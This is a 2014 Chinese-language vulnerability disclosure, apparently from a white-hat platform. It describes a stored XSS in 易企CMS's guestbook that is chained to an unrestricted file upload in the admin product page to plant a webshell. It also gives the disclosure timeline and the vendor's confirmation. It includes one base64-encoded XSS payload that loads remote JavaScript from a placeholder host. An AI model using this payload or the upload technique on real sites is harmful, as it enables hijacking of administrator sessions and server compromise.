漏洞概要
关注数(24)
关注此漏洞
漏洞标题:易企CMS xss 盲打后台 getshell
提交时间:2014-09-28 19:02
修复时间:2014-12-27 19:04
公开时间:2014-12-27 19:04
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-09-28: 细节已通知厂商并且等待厂商处理中
2014-10-03: 厂商已经确认,细节仅向厂商公开
2014-10-06: 细节向第三方安全合作伙伴开放
2014-11-27: 细节向核心白帽子及相关领域专家公开
2014-12-07: 细节向普通白帽子公开
2014-12-17: 细节向实习白帽子公开
2014-12-27: 细节向公众公开
简要描述:
易企CMS xss 盲打后台 getshell
详细说明:
直接进入网站留言:
然后去后台查看留言:
这里我们更换一下payload:
<object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3NpdGUuY29tL3NoZWxsLmpzPjwvc2NyaXB0Pg==">
加载一个远程的js,http://site.com/shell.js js里面可以这样写:
这段代码就是在后台有一个添加产品的地方,我们直接看代码:
product-add.php(27-45):
发现问题了没有,这里的filename=date("ymdhis")
我们跟进去$upload->set_file_name($filename);
在看看:
upload.class.php(55-59):
这里没有做任何限制,什么后缀 就什么保留
当管理员审核我们留言的时候,我们提交之后发现在这个目录下有个shell文件:
。。。。。。。。
漏洞证明:
修复方案:
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-10-03 18:07
厂商回复:
谢谢支持。
最新状态:
暂无
漏洞评价:
评论
-
2014-09-28 19:07 |
子非海绵宝宝 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)
-
2014-09-28 19:49 |
铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)